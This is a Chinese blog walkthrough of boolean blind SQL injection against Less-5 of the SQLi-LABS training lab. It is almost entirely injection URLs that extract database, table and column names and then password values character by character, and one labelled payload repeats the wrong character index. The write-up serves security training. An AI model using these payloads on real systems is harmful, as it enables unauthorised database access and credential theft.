• SQL布尔盲注-(针对SQLi-LABS Page-1(Basic Challenges)第五关)

    库操作

    库名长度

    http://localhost/sqli/Less-5/?id=1'and (length(database())=10)--+

    其他库长度

    http://localhost/sqli/Less-5/?id=1'and (length((select schema_name from information_schema.schemata limit 0,1))=6)--+

    求本库名字符

    http://localhost/sqli/Less-5/?id=1'and (ascii(substr(database(),1,1))>32)--+

    求其他库名字符

    http://localhost/sqli/Less-5/?id=1'and (ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>32)--+

    表操作

    表长度

    http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6)--+

    第二个表长度

    http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 2,1))=6)--+

    第一个表名第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>32)--+

    第一个表名第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>32)--+

    第二个表名第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>32)--+

    第二个表名第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>32)--+

    字段操作

    求字段长度

    http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1))=2)--+

    求第二个字段长度

    http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1))=2)--+

    求第一个字段第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>32)--+

    求第一个字段第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>32)--+

    求第二个字段第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),1,1))>32)--+

    求第二个字段第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),2,1))>32)--+

    数据操作

    求第一个数据长度

    http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 0,1))=32)--+

    求第二个数据长度

    http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 1,1))=32)--+

    求第一个数据的第一个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),1,1))>32)--+

    求第一个数据的第二个字符

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),2,1))>32)--+

    可以根据以上信息总结公式进行改编套用。

    如内容有误,欢迎评论区提出建议与意见。
  • 相关阅读:
    Environment variable ORACLE_UNQNAME not defined. Please set ORACLE_UNQNAME to database unique name. 的解决方法
    无法打开物理文件xxx.mdf 操作系统错误 5:“5(拒绝访问。)” (Microsoft SQL Server,错误: 5120) 的解决方法
    IIS7.5 处理程序“PageHandlerFactory-Integrated”在其模块列表中有一个错误模块“ManagedPipelineHandler” 错误的解决方法
    datetime
    9.29中文词频统计
    9.26文件方式实现完整的英文词频统计实例
    9.22
    英文词频统计预备,组合数据类型练习
    9.19凯撒密码、GDP格式化输出、99乘法表
    9.15字符串基本操作
  • 原文地址:https://www.cnblogs.com/Tzsblog/p/14189984.html
Copyright © 2020-2023  润新知